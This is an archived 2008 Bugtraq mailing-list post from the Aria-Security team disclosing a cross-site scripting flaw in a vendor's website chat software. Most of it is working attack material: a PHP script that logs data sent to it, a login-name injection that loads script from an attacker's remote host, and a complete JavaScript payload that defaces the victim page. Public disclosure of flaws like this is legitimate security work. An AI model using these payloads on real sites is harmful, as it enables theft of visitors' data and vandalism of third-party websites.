| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 10 Feb 2008 09:26:47 -0000
From: no-reply@...a-security.net
To: bugtraq@...urityfocus.com
Subject: پيش گزيده Website
Design Chat Software Remote Cross-Site Scripting
Aria-Security Team (Persian Security Network)
httP://Aria-Security.Net
---------------------------------------------
Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N,
A Special Thanks to my dear friend Mh_p0rtal for his great help in order to find this vuln.
Vendor: http://www.softwebsnepal.com
Demo: http://www.softwebsnepal.com/website_design_chat_software.htm
Original Advisory: http://forum.aria-security.net/showthread.php?t=517
First we need a little php file in order to get and save our needed information + A txt file to save them there and chmod must be 777 in order to work
[code]
<?php
if ( $_GET['text'] ) {
$text = $_GET['text'];
$filename = "Aria-Security.txt";
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");
fwrite( $fp, "$text" );
fclose( $fp );
}
//--------------
$filename = "test.txt";
$fp = fopen( $filename, "r" ) or die("Couldn't open $filename");
while ( ! feof( $fp ) )
{
$line = fgets( $fp, 1024 );
print "$line<br>";
}
fclose($fp);
?>
[/code]
login as:
<script src=http://Yourwebsite.com/yourfile.js></script>
(For Script Visit original link)
NOT RECOMENDED: Byt you can also just upload a "deface page", something like:
[code]
var title = "Aria-Security.Net";
var bgcolor = "#HEX";
var image_url = "http://ariahosting.ir/index.html";
var text = "The-0utl4w";
var font_color = "#HEX";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor;
txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") {
var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg);
}
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD';
footer.innerHTML = title;
overLay.appendChild(footer);
}
[/code]
Regards,
The-0utl4w
Credits Goes to Aria-Security Team
http://Aria-Security.Net
Powered by blists - more mailing lists